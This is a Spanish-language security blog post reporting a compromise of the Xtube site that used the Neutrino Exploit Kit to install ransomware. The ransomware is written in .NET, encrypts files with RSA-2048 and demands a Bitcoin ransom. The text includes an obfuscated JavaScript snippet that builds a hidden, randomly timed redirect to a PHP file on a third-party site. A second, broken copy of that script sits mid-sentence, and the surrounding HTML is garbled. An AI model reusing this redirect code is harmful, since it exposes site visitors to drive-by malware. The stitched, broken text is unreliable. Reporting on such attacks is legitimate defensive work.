Otros sistemas para infección de ransomwares que cifran los archivos con algoritmo RSA-2048: “Neutrino Exploit Kit“
La semana pasada hemos hablado de una amenaza que se distribuía a través de la web erótica Xtube. Un grupo de piratas informáticos había comprometido el portal y sus visitantes estaban empezando a verse atacados por estos. Los atacantes estaban descargando malware de forma oculta en los sistemas de las víctimas a la vez que redirigían a estos a otras web, generalmente controladas por ellos y con una gran variedad de exploits, para seguir infectando los sistemas de las víctimas.
Tras una semana, los ataques se han intensificado y los piratas informáticos han dado un paso adelante en cuanto a la peligrosidad. A partir de ahora las vulnerabilidades de utilizan para redirigir a los usuarios a una web con el “Neutrino Exploit Kit“, desde donde se descarga en los sistemas de las víctimas un malware llamado “xtube.exe” que, al ejecutarlo, empieza a cifrar todos los datos personales de las víctimas para pedir posteriormente un rescate por ellos.
Podemos ver el análisis de este ransomware en el siguiente enlace. El ransomware ha sido escrito completamente en .Net y se ha utilizado de4dot para ofuscar el código.
Cuando el ransomware infecta a un usuario automáticamente se cifran todos los archivos con un algoritmo RSA-2048 y pide un pago en Bitcoin a través de la red Tor para poder recuperar el acceso a los mismos.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-655×496.png” alt=”” width=”655″ height=”496″ /></p>
<p>Como podemos ver una vez más, las webs con gran afluencia de tráfico son blancos muy interesantes para los piratas informáticos. A través de estas páginas se pueden llevar a cabo <script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
todo tipo de estafas y ataques remotos con el fin de que el usuario, simplemente accediendo a la web, pueda llegar a verse víctima de piratas informáticos con pérdidas casi incalculables, como puede ser el cifrado de las fotos personales de uno.
Si hemos sido víctimas de este ransomware lo más recomendable es restaurar nuestra copia de seguridad y asegurarnos de desinfectar correctamente el sistema ya que aunque realicemos el pago no podemos estar seguros de que este vaya a permitirnos recuperar los archivos.
Ver informacion original al respecto en Fuente:
http://www.redeszone.net/2015/04/01/exploit-xtube-distribuir-ransomware/
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.